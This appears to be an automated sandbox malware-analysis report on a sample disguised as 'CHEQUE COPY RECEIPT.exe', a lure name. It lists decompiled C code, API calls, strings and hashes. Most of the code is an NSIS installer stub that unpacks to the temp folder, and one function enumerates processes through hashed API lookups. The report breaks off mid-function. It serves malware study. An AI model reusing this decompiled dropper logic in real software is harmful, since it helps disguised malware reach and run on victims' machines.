0x00405a86
0x00405a86
0x00405a93
0x00405a96
0x00405aa1
0x00405aa7
0x00405aac
0x00405abc
0x00405abe
0x00405ac4
0x00405ac7
0x00405aca
0x00405b82
0x00405b82
0x00405b86
0x00405b88
0x00405b88
0x00405b88
0x00405b88
0x00000000
0x00000000
0x00000000
0x00000000
0x00405ad0
0x00405ad0
0x00405ad9
0x00405adf
0x00405ae4
0x00405ae7
0x00405ae9
0x00405aed
0x00405aef
0x00405aef
0x00405aed
0x00405af2
0x00405af5
0x00405b08
0x00405b0a
0x00405b0f
0x00405b16
0x00405b31
0x00405b36
0x00405b38
0x00405b5c
0x00405b3a
0x00405b3a
0x00405b3d
0x00405b51
0x00405b3f
0x00405b42
0x00405b4a
0x00405b4a
0x00405b3d
0x00405b18
0x00405b1e
0x00405b20
0x00405b26
0x00405b26
0x00405b20
0x00000000
0x00405b16
0x00405af7
0x00405afa
0x00405afc
0x00000000
0x00000000
0x00405afe
0x00405b00
0x00000000
0x00000000
0x00405b02
0x00405b06
0x00000000
0x00000000
0x00000000
0x00405b61
0x00405b6b
0x00405b71
0x00405b71
0x00405b7c
0x00000000
0x00405b7c
0x00405a98
0x00405a9f
0x00000000
0x00000000
0x00000000
0x00405a5d
0x00405a5d
0x00405a5f
0x00405b8c
0x00405b8e
0x00405b91
0x00405be2
0x00405be2
0x00405be2
0x00405b93
0x00405b96
0x00405ba1
0x00405ba6
0x00405ba8
0x00000000
0x00000000
0x00405bab
0x00405bb7
0x00405bbc
0x00405bbe
0x00000000
0x00405bd9
0x00405bc0
0x00405bc3
0x00000000
0x00000000
0x00405bc8
0x00000000
0x00405bcf
0x00405b98
0x00405b98
0x00000000
0x00405b98
0x00405a65
0x00405a68
0x00000000
0x00000000
0x00000000
0x00405a68

APIs

DeleteFileA.KERNEL32(?,?,7519FA90,7519F560,00000000), ref: 00405A3E
lstrcatA.KERNEL32(0042B8C0,\*.*,0042B8C0,?,?,7519FA90,7519F560,00000000), ref: 00405A86
lstrcatA.KERNEL32(?,0040A014,?,0042B8C0,?,?,7519FA90,7519F560,00000000), ref: 00405AA7
lstrlenA.KERNEL32(?,?,0040A014,?,0042B8C0,?,?,7519FA90,7519F560,00000000), ref: 00405AAD
FindFirstFileA.KERNEL32(0042B8C0,?,?,?,0040A014,?,0042B8C0,?,?,7519FA90,7519F560,00000000), ref: 00405ABE
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405B6B
FindClose.KERNEL32(00000000), ref: 00405B7C

Strings

"C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe" , xrefs: 00405A15
\*.*, xrefs: 00405A80

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe" $\*.*
API String ID: 2035342205-4133683087
Opcode ID: 69a25cc0b3387fa96190ed46bbbe5fcf67501b15cfd31fdf283598513c4af137
Instruction ID: d18931d2cc373ca10ddd825d8c89070702ac43f2d06cec063aa43078d7fd9c24
Opcode Fuzzy Hash: 69a25cc0b3387fa96190ed46bbbe5fcf67501b15cfd31fdf283598513c4af137
Instruction Fuzzy Hash: EB51AE30900A08AADF21AB258C85BAF7B78DF42714F14417BF841761D1D77CA982DE69

Uniqueness

Uniqueness Score: -1.00%

Function 100041FD, Relevance: 3.1, APIs: 2, Instructions: 52
processCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E100041FD(void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v544;
				char _v580;
				struct tagPROCESSENTRY32W* _t25;

				_v8 = E10004564();
				_v16 = E1000460C(_v8, 0xea31d3b6);
				_v20 = E1000460C(_v8, 0x5c7bf6e9);
				_v24 = E1000460C(_v8, 0x873d1860);
				_v12 = CreateToolhelp32Snapshot(2, 0);
				if(_v12 != 0xffffffff) {
					_v580 = 0x22c;
					_t25 =  &_v580;
					Process32FirstW(_v12, _t25);
					if(_t25 != 0) {
						while(E100041B9( &_v544) != _a4) {
							_push( &_v580);
							_push(_v12);
							if(_v24() != 0) {
								continue;
							}
							return 0;
						}
						return 1;
					}
					return 0;
				}
				return 0;
			}

0x1000420b
0x1000421b
0x1000422b
0x1000423b
0x10004245
0x1000424c
0x10004252
0x1000425c
0x10004266
0x1000426b
0x10004271
0x1000428d
0x1000428e
0x10004296
0x00000000
0x00000000
0x00000000
0x10004298
0x00000000
0x10004284
0x00000000
0x1000426d
0x00000000

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,873D1860,?,5C7BF6E9,?,EA31D3B6), ref: 10004242
Process32FirstW.KERNEL32(000000FF,0000022C), ref: 10004266

Memory Dump Source

Source File: 00000000.00000002.241943494.0000000010003000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.241682424.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.241819208.0000000010001000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.241866265.0000000010002000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.241953388.0000000010005000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFirstProcess32SnapshotToolhelp32
String ID:
API String ID: 2353314856-0
Opcode ID: 4fec2c12de2fa19a68e7ad0317d70262ee43ba40948bb73445af5165cff89eff
Instruction ID: 404db1fc38640611994a30d65a515dec8e00ceeec5689e89a360ff1643e68d53
Opcode Fuzzy Hash: 4fec2c12de2fa19a68e7ad0317d70262ee43ba40948bb73445af5165cff89eff
Instruction Fuzzy Hash: 93112AB4E00249FFEB10DFB0CC49AAEBBB8EF04380F5245A5F914E1154EB315E509B59

Uniqueness

Uniqueness Score: -1.00%

Function 004065C1, Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004065C1(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x42c108); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x42c108;
			}

0x004065cc
0x004065d5
0x00000000
0x004065e2
0x004065d8
0x00000000

APIs

FindFirstFileA.KERNEL32(7519FA90,0042C108,0042BCC0,00405D16,0042BCC0,0042BCC0,00000000,0042BCC0,0042BCC0,7519FA90,?,7519F560,00405A35,?,7519FA90,7519F560), ref: 004065CC
FindClose.KERNEL32(00000000), ref: 004065D8

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 408c3bd952a2bc64c67f6fce5e771ecc13df240ec72af80f2275416dd01175bc
Instruction ID: 5989989b5290daefe0063212e93516784f0ef67bd1aed84395a1ba9114d6aba9
Opcode Fuzzy Hash: 408c3bd952a2bc64c67f6fce5e771ecc13df240ec72af80f2275416dd01175bc
Instruction Fuzzy Hash: 1BD01231508130ABC7455B387D4C85B7A98AF153317618A37F466F12E4C734CC228698

Uniqueness

Uniqueness Score: -1.00%

Function 00403A60, Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00403A60(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t17;
				void* _t25;
				void* _t27;
				int _t28;
				void* _t31;
				int _t34;
				int _t35;
				intOrPtr _t36;
				int _t39;
				char _t57;
				CHAR* _t59;
				signed char _t63;
				CHAR* _t74;
				intOrPtr _t76;
				CHAR* _t81;

				_t76 =  *0x42f454;
				_t17 = E00406656(2);
				_t84 = _t17;
				if(_t17 == 0) {
					_t74 = 0x42a8b8;
					"1033" = 0x30;
					 *0x436001 = 0x78;
					 *0x436002 = 0;
					E00406134(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a8b8, 0);
					__eflags =  *0x42a8b8;
					if(__eflags == 0) {
						E00406134(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040836A, 0x42a8b8, 0);
					}
					lstrcatA("1033", _t74);
				} else {
					E004061AB("1033",  *_t17() & 0x0000ffff);
				}
				E00403D25(_t71, _t84);
				_t80 = "C:\\Users\\alfons\\AppData\\Local\\Temp";
				 *0x42f4e0 =  *0x42f45c & 0x00000020;
				 *0x42f4fc = 0x10000;
				if(E00405CD3(_t84, "C:\\Users\\alfons\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405CD3(_t92, _t80) == 0) {
						E004062E0(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118)));
					}
					_t25 = LoadImageA( *0x42f440, 0x67, 1, 0, 0, 0x8040);
					 *0x42ec28 = _t25;
					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t27 = E00403D25(_t71, __eflags);
							__eflags =  *0x42f500;
							if( *0x42f500 != 0) {
								_t28 = E00405446(_t27, 0);
								__eflags = _t28;
								if(_t28 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42ec0c; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42a898, 5); // executed
							_t34 = E004065E8("RichEd20"); // executed
							__eflags = _t34;
							if(_t34 == 0) {
								E004065E8("RichEd32");
							}
							_t81 = "RichEdit20A";
							_t35 = GetClassInfoA(0, _t81, 0x42ebe0);
							__eflags = _t35;
							if(_t35 == 0) {
								GetClassInfoA(0, "RichEdit", 0x42ebe0);
								 *0x42ec04 = _t81;
								RegisterClassA(0x42ebe0);
							}
							_t36 =  *0x42ec20; // 0x0
							_t39 = DialogBoxParamA( *0x42f440, _t36 + 0x00000069 & 0x0000ffff, 0, E00403DFD, 0); // executed
							E004039B0(E0040140B(5), 1);
							return _t39;
						}
						L22:
						_t31 = 2;
						return _t31;
					} else {
						_t71 =  *0x42f440;
						 *0x42ebe4 = E00401000;
						 *0x42ebf0 =  *0x42f440;
						 *0x42ebf4 = _t25;
						 *0x42ec04 = 0x40a210;
						if(RegisterClassA(0x42ebe0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoA(0x30, 0,  &_v16, 0);
						 *0x42a898 = CreateWindowExA(0x80, 0x40a210, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42f440, 0);
						goto L21;
					}
				} else {
					_t71 =  *(_t76 + 0x48);
					_t86 = _t71;
					if(_t71 == 0) {
						goto L16;
					}
					_t74 = 0x42e3e0;
					E00406134(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x42f498, 0x42e3e0, 0);
					_t57 =  *0x42e3e0; // 0x43
					if(_t57 == 0) {
						goto L16;
					}
					if(_t57 == 0x22) {
						_t74 = 0x42e3e1;
						 *((char*)(E00405C10(0x42e3e1, 0x22))) = 0;
					}
					_t59 = lstrlenA(_t74) + _t74 - 4;
					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
						L15:
						E0040624D(_t80, E00405BE5(_t74));
						goto L16;
					} else {
						_t63 = GetFileAttributesA(_t74);
						if(_t63 == 0xffffffff) {
							L14:
							E00405C2C(_t74);
							goto L15;
						}
						_t92 = _t63 & 0x00000010;
						if((_t63 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00403a66
0x00403a6f
0x00403a76
0x00403a78
0x00403a8c
0x00403a9e
0x00403aa5
0x00403aac
0x00403ab2
0x00403ab7
0x00403abd
0x00403ad0
0x00403ad0
0x00403adb
0x00403a7a
0x00403a85
0x00403a85
0x00403ae0
0x00403aea
0x00403af3
0x00403af8
0x00403b09
0x00403b90
0x00403b98
0x00403ba1
0x00403ba1
0x00403bb7
0x00403bbd
0x00403bcb
0x00403c4c
0x00403c54
0x00403c5e
0x00403c63
0x00403c69
0x00403cf3
0x00403cf8
0x00403cfa
0x00403d16
0x00000000
0x00403d16
0x00403cfc
0x00403d02
0x00403d0a
0x00403d0a
0x00000000
0x00403d02
0x00403c77
0x00403c82
0x00403c87
0x00403c89
0x00403c90
0x00403c90
0x00403c9b
0x00403ca3
0x00403ca5
0x00403ca7
0x00403cb0
0x00403cb3
0x00403cb9
0x00403cb9
0x00403cbf
0x00403cd8
0x00403ce9
0x00000000
0x00403cee
0x00403c56
0x00403c58
0x00000000
0x00403bcd
0x00403bcd
0x00403bd9
0x00403be3
0x00403be9
0x00403bee
0x00403bfd
0x00403d1b
0x00403d1b
0x00000000
0x00403d1b
0x00403c0c
0x00403c47
0x00000000
0x00403c47
0x00403b0f
0x00403b0f
0x00403b12
0x00403b14
0x00000000
0x00000000
0x00403b1e
0x00403b2e
0x00403b33
0x00403b3a
0x00000000
0x00000000
0x00403b3e
0x00403b40
0x00403b4d
0x00403b4d
0x00403b55
0x00403b5b
0x00403b83
0x00403b8b
0x00000000
0x00403b6d
0x00403b6e
0x00403b77
0x00403b7d
0x00403b7e
0x00000000
0x00403b7e
0x00403b79
0x00403b7b
0x00000000
0x00000000
0x00000000
0x00403b7b
0x00403b5b

APIs

Part of subcall function 00406656: GetModuleHandleA.KERNEL32(?,?,?,004034F9,0000000B), ref: 00406668
Part of subcall function 00406656: GetProcAddress.KERNEL32(00000000,?), ref: 00406683

lstrcatA.KERNEL32(1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000,00000002,7519FA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe" ,00000000), ref: 00403ADB
lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000,00000002,7519FA90), ref: 00403B50
lstrcmpiA.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042A8B8,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A8B8,00000000), ref: 00403B63
GetFileAttributesA.KERNEL32(Call), ref: 00403B6E
LoadImageA.USER32 ref: 00403BB7

Part of subcall function 004061AB: wsprintfA.USER32 ref: 004061B8

RegisterClassA.USER32 ref: 00403BF4
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403C0C
CreateWindowExA.USER32 ref: 00403C41
ShowWindow.USER32(00000005,00000000), ref: 00403C77
GetClassInfoA.USER32 ref: 00403CA3
GetClassInfoA.USER32 ref: 00403CB0
RegisterClassA.USER32 ref: 00403CB9
DialogBoxParamA.USER32 ref: 00403CD8

Strings

.DEFAULT\Control Panel\International, xrefs: 00403AC6
B, xrefs: 00403BC6
"C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe" , xrefs: 00403A64
C:\Users\user\AppData\Local\Temp, xrefs: 00403AEA, 00403AF2, 00403B8A, 00403B90, 00403BA0
RichEd20, xrefs: 00403C7D
.exe, xrefs: 00403B5D
RichEdit20A, xrefs: 00403C9B, 00403CA1
C:\Users\user\AppData\Local\Temp\, xrefs: 00403A65
Call, xrefs: 00403B1E, 00403B26, 00403B33, 00403B7D, 00403B83
1033, xrefs: 00403A80, 00403AD6
_Nb, xrefs: 00403BD3, 00403C3B
RichEdit, xrefs: 00403CAA
Control Panel\Desktop\ResourceLocale, xrefs: 00403A94
RichEd32, xrefs: 00403C8B

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$B
API String ID: 1975747703-1790869712
Opcode ID: ab99cccd9c0ddd3d495b147680853500dcd9db92bcd335ab5c1b079dcb87365f
Instruction ID: 8734c0f5f73e26911640e72846d54346a9337973c4420bd4a4a6803de24d7ebf
Opcode Fuzzy Hash: ab99cccd9c0ddd3d495b147680853500dcd9db92bcd335ab5c1b079dcb87365f
Instruction Fuzzy Hash: 1B61C6702042007EE620BF669D46F373AACDB4474DF94443FF945B62E2CA7DA9068A2D

Uniqueness

Uniqueness Score: -1.00%

Function 00402EF1, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 208
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00402EF1(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				long _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				long _t82;
				signed int _t89;
				intOrPtr _t92;
				intOrPtr _t100;
				void* _t104;
				intOrPtr _t105;
				long _t106;
				long _t109;
				void* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x42f450 = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\alfons\\Desktop\\CHEQUE COPY RECEIPT.exe", 0x400);
				_t104 = E00405DE6("C:\\Users\\alfons\\Desktop\\CHEQUE COPY RECEIPT.exe", 0x80000000, 3);
				 *0x40a018 = _t104;
				if(_t104 == 0xffffffff) {
					return "Error launching installer";
				}
				E0040624D("C:\\Users\\alfons\\Desktop", "C:\\Users\\alfons\\Desktop\\CHEQUE COPY RECEIPT.exe");
				E0040624D(0x437000, E00405C2C("C:\\Users\\alfons\\Desktop"));
				_t54 = GetFileSize(_t104, 0);
				 *0x429470 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402E52(1);
					if( *0x42f458 == 0) {
						goto L30;
					}
					if(_v12 == 0) {
						L26:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t110 = _t57;
						_t105 = 8;
						 *0x415458 = 0x40d450;
						 *0x415454 = 0x40d450;
						 *0x40b8b0 = _t105;
						 *0x40bdcc = 0;
						 *0x40bdc8 = 0;
						 *0x415450 = 0x415450; // executed
						E00405E15( &_v300, "C:\\Users\\alfons\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E0040343E( *0x42f458 + 0x1c);
							 *0x429474 = _t65;
							 *0x429468 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E004031B7(_v16, 0xffffffff, 0, _t110, _v20); // executed
							if(_t68 == _v20) {
								 *0x42f454 = _t110;
								 *0x42f45c =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x42f460 =  *0x42f460 + 1;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t100 = _t105;
								do {
									_t70 = _t70 - _t105;
									 *_t70 =  *_t70 + _t110;
									_t100 = _t100 - 1;
								} while (_t100 != 0);
								 *((intOrPtr*)(_t110 + 0x3c)) =  *0x429464;
								E00405DA1(0x42f480, _t110 + 4, 0x40);
								return 0;
							}
							goto L30;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E0040343E( *0x429460);
					if(E00403428( &_a4, 4) == 0 || _v8 != _a4) {
						goto L30;
					} else {
						goto L26;
					}
				} else {
					do {
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x42f458) & 0x00007e00) + 0x200;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						if(E00403428(0x421460, _t106) == 0) {
							E00402E52(1);
							L30:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x42f458 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00402E52(0);
							}
							goto L19;
						}
						E00405DA1( &_v40, 0x421460, 0x1c);
						_t89 = _v40;
						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t89;
							 *0x42f500 =  *0x42f500 | _a4 & 0x00000002;
							_t92 = _v16;
							 *0x42f458 =  *0x429460;
							if(_t92 > _t109) {
								goto L30;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t109 = _t92 - 4;
								if(_t106 > _t109) {
									_t106 = _t109;
								}
								goto L19;
							} else {
								goto L22;
							}
						}
						L19:
						if(_t109 <  *0x429470) {
							_v8 = E0040670D(_v8, 0x421460, _t106);
						}
						 *0x429460 =  *0x429460 + _t106;
						_t109 = _t109 - _t106;
					} while (_t109 != 0);
					goto L22;
				}
			}

0x00402eff
0x00402f02
0x00402f1c
0x00402f21
0x00402f34
0x00402f39
0x00402f3f
0x00000000
0x00402f41
0x00402f52
0x00402f63
0x00402f6a
0x00402f72
0x00402f77
0x00402f79
0x00403067
0x00403069
0x00403075
0x00000000
0x00000000
0x0040307e
0x004030aa
0x004030af
0x004030b5
0x004030be
0x004030bf
0x004030c4
0x004030d5
0x004030db
0x004030e1
0x004030e7
0x004030f1
0x0040310c
0x00403115
0x0040311a
0x00403139
0x00403149
0x0040315b
0x00403160
0x00403168
0x00403175
0x0040317d
0x00403182
0x00403184
0x00403184
0x0040318a
0x0040318a
0x0040318d
0x0040318f
0x0040318f
0x00403191
0x00403193
0x00403193
0x0040319d
0x004031a9
0x00000000
0x004031ae
0x00000000
0x00403168
0x00000000
0x0040311c
0x00403086
0x00403098
0x00000000
0x00000000
0x00000000
0x00000000
0x00402f7f
0x00402f7f
0x00402f84
0x00402f88
0x00402f8f
0x00402f96
0x00402f98
0x00402f98
0x00402fa7
0x00403128
0x0040316a
0x00000000
0x0040316a
0x00402fb3
0x00403037
0x0040303a
0x0040303f
0x00000000
0x00403037
0x00402fc0
0x00402fc5
0x00402fcd
0x00402ff3
0x00403002
0x00403008
0x0040300d
0x00403013
0x00000000
0x00000000
0x0040301d
0x00403025
0x00403028
0x0040302d
0x0040302f
0x0040302f
0x00000000
0x00000000
0x00000000
0x00000000
0x0040301d
0x00403040
0x00403046
0x00403056
0x00403056
0x00403059
0x0040305f
0x0040305f
0x00000000
0x00402f7f

APIs

GetTickCount.KERNEL32 ref: 00402F05
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe,00000400), ref: 00402F21

Part of subcall function 00405DE6: GetFileAttributesA.KERNEL32(00000003,00402F34,C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe,80000000,00000003), ref: 00405DEA
Part of subcall function 00405DE6: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0C

GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe,C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe,80000000,00000003), ref: 00402F6A
GlobalAlloc.KERNEL32(00000040,0040A130), ref: 004030AF

Strings

Null, xrefs: 00402FEA
Inst, xrefs: 00402FD8
C:\Users\user\Desktop, xrefs: 00402F4C, 00402F51, 00402F57
C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe, xrefs: 00402F0B, 00402F1A, 00402F2E, 00402F4B
soft, xrefs: 00402FE1
"C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe" , xrefs: 00402EF1
Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040311C
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 0040316A
Error launching installer, xrefs: 00402F41
C:\Users\user\AppData\Local\Temp\, xrefs: 00402EFB, 004030CF

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 2803837635-51307209
Opcode ID: c7140cee4d51e81b519843824b21cc99042816bf3a65f540c359333e0c5614f7
Instruction ID: e8b4360117e31fb5ea1b260af931ada4a8b54667cc236f60df091846fad1fe42
Opcode Fuzzy Hash: c7140cee4d51e81b519843824b21cc99042816bf3a65f540c359333e0c5614f7
Instruction Fuzzy Hash: B471D171A00204ABDB20AF64DD45B9A7BB8EB14719F60803BE505BB2D1D77CAE468B5C

Uniqueness

Uniqueness Score: -1.00%

Function 00401759, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147
stringtimeCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00401759(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402BCE(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E00405C52(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E00405BE5(E0040624D(0x40a450, "C:\\Users\\alfons\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x40a450);
					E0040624D();
				}
				E00406528(0x40a450);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E004065C1(0x40a450);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405DC1(0x40a450);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E00405DE6(0x40a450, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0xc) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
